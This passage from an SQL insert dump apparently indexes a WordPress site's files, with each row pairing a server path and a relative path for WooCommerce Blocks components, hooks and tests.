),(8441,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/base/components/product-list/product-list.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/base/components/product-list/product-list.tsx'),(8442,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/base/components/product-list/product-sort-select/index.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/base/components/product-list/product-sort-select/index.tsx'),(8443,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/base/components/product-list/product-sort-select/style.scss','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/base/components/product-list/product-sort-select/style.scss'),(8444,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/base/components/product-list/style.scss','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/base/components/product-list/style.scss'),(8445,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/base/components/product-list/types.ts','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/base/components/product-list/types.ts'),(8446,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/base/components/product-name/index.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/base/components/product-name/index.tsx'),(8447,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/base/components/product-name/stories/index.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/base/components/product-name/stories/index.tsx'),(8448,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/base/components/product-name/style.scss','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/base/components/product-name/style.scss'),(8449,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/base/components/product-name/test/__snapshots__/index.js.snap','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/base/components/product-name/test/__snapshots__/index.js.snap'),(8450,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/base/components/product-name/test/index.js','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/base/components/product-name/test/index.js'),(8451,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/base/components/product-price/index.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/base/components/product-price/index.tsx'),(8452,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/base/components/product-price/stories/index.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/base/components/product-price/stories/index.tsx'),(8453,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/base/components/product-price/style.scss','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/base/components/product-price/style.scss'),(8454,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/base/components/product-price/test/__snapshots__/index.js.snap','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/base/components/product-price/test/__snapshots__/index.js.snap'),(8455,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/base/components/product-price/test/index.js','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/base/components/product-price/test/index.js'),(8456,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/base/components/product-rating/index.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/base/components/product-rating/index.tsx'),(8457,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/base/components/product-rating/style.scss','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/base/components/product-rating/style.scss'),(8458,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/base/components/quantity-selector/index.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/base/components/quantity-selector/index.tsx'),(8459,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/base/components/quantity-selector/stories/index.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/base/components/quantity-selector/stories/index.tsx'),(8460,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/base/components/quantity-selector/style.scss','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/base/components/quantity-selector/style.scss'),(8461,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/base/components/radio-control/index.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/base/components/radio-control/index.tsx'),(8462,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/base/components/radio-control/option-layout.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/base/components/radio-control/option-layout.tsx'),(8463,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/base/components/radio-control/option.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/base/components/radio-control/option.tsx'),(8464,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/base/components/radio-control/style.scss','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/base/components/radio-control/style.scss'),(8465,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/base/components/radio-control/types.ts','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/base/components/radio-control/types.ts'),(8466,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/base/components/radio-control-accordion/index.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/base/components/radio-control-accordion/index.tsx'),(8467,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/base/components/read-more/index.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/base/components/read-more/index.tsx'),(8468,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/base/components/read-more/stories/index.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/base/components/read-more/stories/index.tsx'),(8469,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/base/components/read-more/test/index.ts','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/base/components/read-more/test/index.ts'),(8470,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/base/components/read-more/trim-html.js','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/base/components/read-more/trim-html.js'),(8471,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/base/components/read-more/utils.ts','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/base/components/read-more/utils.ts'),(8472,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/base/components/reviews/index.js','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/base/components/reviews/index.js'),(8473,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/base/components/reviews/review-list/index.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/base/components/reviews/review-list/index.tsx'),(8474,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/base/components/reviews/review-list/style.scss','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/base/components/reviews/review-list/style.scss'),(8475,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/base/components/reviews/review-list-item/index.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/base/components/reviews/review-list-item/index.tsx'),(8476,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/base/components/reviews/review-list-item/style.scss','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/base/components/reviews/review-list-item/style.scss'),(8477,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/base/components/reviews/review-sort-select/index.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/base/components/reviews/review-sort-select/index.tsx'),(8478,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/base/components/reviews/review-sort-select/style.scss','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/base/components/reviews/review-sort-select/style.scss'),(8479,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/base/components/reviews/types.ts','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/base/components/reviews/types.ts'),(8480,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/base/components/sidebar-layout/index.js','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/base/components/sidebar-layout/index.js'),(8481,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/base/components/sidebar-layout/main.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/base/components/sidebar-layout/main.tsx'),(8482,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/base/components/sidebar-layout/sidebar-layout.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/base/components/sidebar-layout/sidebar-layout.tsx'),(8483,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/base/components/sidebar-layout/sidebar.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/base/components/sidebar-layout/sidebar.tsx'),(8484,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/base/components/sidebar-layout/style.scss','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/base/components/sidebar-layout/style.scss'),(8485,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/base/components/sidebar-layout/types.ts','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/base/components/sidebar-layout/types.ts'),(8486,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/base/components/skeleton/index.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/base/components/skeleton/index.tsx'),(8487,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/base/components/skeleton/style.scss','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/base/components/skeleton/style.scss'),(8488,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/base/components/snackbar-list/constants.ts','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/base/components/snackbar-list/constants.ts'),(8489,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/base/components/snackbar-list/index.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/base/components/snackbar-list/index.tsx'),(8490,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/base/components/snackbar-list/snackbar.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/base/components/snackbar-list/snackbar.tsx'),(8491,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/base/components/snackbar-list/stories/index.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/base/components/snackbar-list/stories/index.tsx'),(8492,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/base/components/snackbar-list/style.scss','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/base/components/snackbar-list/style.scss'),(8493,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/base/components/sort-select/index.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/base/components/sort-select/index.tsx'),(8494,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/base/components/sort-select/style.scss','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/base/components/sort-select/style.scss'),(8495,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/base/components/spinner/index.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/base/components/spinner/index.tsx'),(8496,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/base/components/spinner/style.scss','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/base/components/spinner/style.scss'),(8497,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/base/components/state-input/StateInputProps.ts','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/base/components/state-input/StateInputProps.ts'),(8498,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/base/components/state-input/billing-state-input.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/base/components/state-input/billing-state-input.tsx'),(8499,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/base/components/state-input/index.ts','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/base/components/state-input/index.ts'),(8500,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/base/components/state-input/shipping-state-input.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/base/components/state-input/shipping-state-input.tsx'),(8501,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/base/components/state-input/state-input.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/base/components/state-input/state-input.tsx'),(8502,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/base/components/state-input/style.scss','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/base/components/state-input/style.scss'),(8503,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/base/components/summary/index.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/base/components/summary/index.tsx'),(8504,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/base/components/summary/test/index.js','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/base/components/summary/test/index.js'),(8505,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/base/components/summary/utils.ts','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/base/components/summary/utils.ts'),(8506,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/base/components/tabs/index.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/base/components/tabs/index.tsx'),(8507,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/base/components/tabs/stories/index.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/base/components/tabs/stories/index.tsx'),(8508,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/base/components/tabs/style.scss','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/base/components/tabs/style.scss'),(8509,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/base/components/textarea/index.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/base/components/textarea/index.tsx'),(8510,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/base/components/textarea/style.scss','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/base/components/textarea/style.scss'),(8511,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/base/components/title/index.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/base/components/title/index.tsx'),(8512,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/base/components/title/style.scss','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/base/components/title/style.scss'),(8513,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/base/context/event-emit/emitter-callback.ts','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/base/context/event-emit/emitter-callback.ts'),(8514,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/base/context/event-emit/emitters.ts','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/base/context/event-emit/emitters.ts'),(8515,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/base/context/event-emit/index.ts','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/base/context/event-emit/index.ts'),(8516,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/base/context/event-emit/reducer.ts','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/base/context/event-emit/reducer.ts'),(8517,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/base/context/event-emit/test/emitters.js','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/base/context/event-emit/test/emitters.js'),(8518,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/base/context/event-emit/types.ts','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/base/context/event-emit/types.ts'),(8519,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/base/context/event-emit/utils.ts','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/base/context/event-emit/utils.ts'),(8520,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/base/context/hooks/cart/index.ts','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/base/context/hooks/cart/index.ts'),(8521,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/base/context/hooks/cart/test/use-store-cart-item-quantity.js','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/base/context/hooks/cart/test/use-store-cart-item-quantity.js'),(8522,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/base/context/hooks/cart/test/use-store-cart.js','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/base/context/hooks/cart/test/use-store-cart.js'),(8523,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/base/context/hooks/cart/use-store-cart-coupons.ts','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/base/context/hooks/cart/use-store-cart-coupons.ts'),(8524,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/base/context/hooks/cart/use-store-cart-event-listeners.ts','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/base/context/hooks/cart/use-store-cart-event-listeners.ts'),(8525,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/base/context/hooks/cart/use-store-cart-item-quantity.ts','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/base/context/hooks/cart/use-store-cart-item-quantity.ts'),(8526,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/base/context/hooks/cart/use-store-cart.ts','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/base/context/hooks/cart/use-store-cart.ts'),(8527,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/base/context/hooks/collections/index.ts','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/base/context/hooks/collections/index.ts'),(8528,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/base/context/hooks/collections/test/use-collection.js','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/base/context/hooks/collections/test/use-collection.js'),(8529,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/base/context/hooks/collections/use-collection-data.ts','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/base/context/hooks/collections/use-collection-data.ts'),(8530,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/base/context/hooks/collections/use-collection-header.ts','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/base/context/hooks/collections/use-collection-header.ts'),(8531,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/base/context/hooks/collections/use-collection.ts','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/base/context/hooks/collections/use-collection.ts'),(8532,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/base/context/hooks/index.js','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/base/context/hooks/index.js'),(8533,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/base/context/hooks/payment-methods/index.js','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/base/context/hooks/payment-methods/index.js'),(8534,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/base/context/hooks/payment-methods/test/use-payment-method-interface.js','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/base/context/hooks/payment-methods/test/use-payment-method-interface.js'),(8535,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/base/context/hooks/payment-methods/use-payment-method-interface.ts','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/base/context/hooks/payment-methods/use-payment-method-interface.ts'),(8536,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/base/context/hooks/payment-methods/use-payment-methods.ts','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/base/context/hooks/payment-methods/use-payment-methods.ts'),(8537,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/base/context/hooks/payment-methods/utils.ts','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/base/context/hooks/payment-methods/utils.ts'),(8538,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/base/context/hooks/shipping/index.js','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/base/context/hooks/shipping/index.js'),(8539,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/base/context/hooks/shipping/types.ts','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/base/context/hooks/shipping/types.ts'),(8540,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/base/context/hooks/shipping/use-shipping-data.ts','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/base/context/hooks/shipping/use-shipping-data.ts'),(8541,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/base/context/hooks/test/use-checkout-submit.js','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/base/context/hooks/test/use-checkout-submit.js'),(8542,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/base/context/hooks/test/use-query-state.js','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/base/context/hooks/test/use-query-state.js'),(8543,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/base/context/hooks/test/use-store-products.js','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/base/context/hooks/test/use-store-products.js'),(8544,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/base/context/hooks/use-checkout-address.ts','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/base/context/hooks/use-checkout-address.ts'),(8545,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/base/context/hooks/use-checkout-extension-data.ts','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/base/context/hooks/use-checkout-extension-data.ts'),(8546,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/base/context/hooks/use-checkout-submit.js','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/base/context/hooks/use-checkout-submit.js'),(8547,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/base/context/hooks/use-customer-data.ts','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/base/context/hooks/use-customer-data.ts'),(8548,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/base/context/hooks/use-product-attributes.ts','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/base/context/hooks/use-product-attributes.ts'),(8549,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/base/context/hooks/use-query-state.js','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/base/context/hooks/use-query-state.js'),(8550,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/base/context/hooks/use-show-shipping-total-warning.ts','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/base/context/hooks/use-show-shipping-total-warning.ts'),(8551,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/base/context/hooks/use-store-add-to-cart.ts','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/base/context/hooks/use-store-add-to-cart.ts'),(8552,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/base/context/hooks/use-store-events.ts','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/base/context/hooks/use-store-events.ts'),(8553,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/base/context/hooks/use-store-products.ts','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/base/context/hooks/use-store-products.ts'),(8554,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/base/context/hooks/use-validation.ts','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/base/context/hooks/use-validation.ts'),(8555,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/base/context/index.ts','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/base/context/index.ts'),(8556,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/base/context/providers/add-to-cart-form/form/index.js','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/base/context/providers/add-to-cart-form/form/index.js'),(8557,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/base/context/providers/add-to-cart-form/form/submit/index.js','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/base/context/providers/add-to-cart-form/form/submit/index.js'),(8558,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/base/context/providers/add-to-cart-form/form-state/actions.js','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/base/context/providers/add-to-cart-form/form-state/actions.js'),(8559,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/base/context/providers/add-to-cart-form/form-state/constants.js','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/base/context/providers/add-to-cart-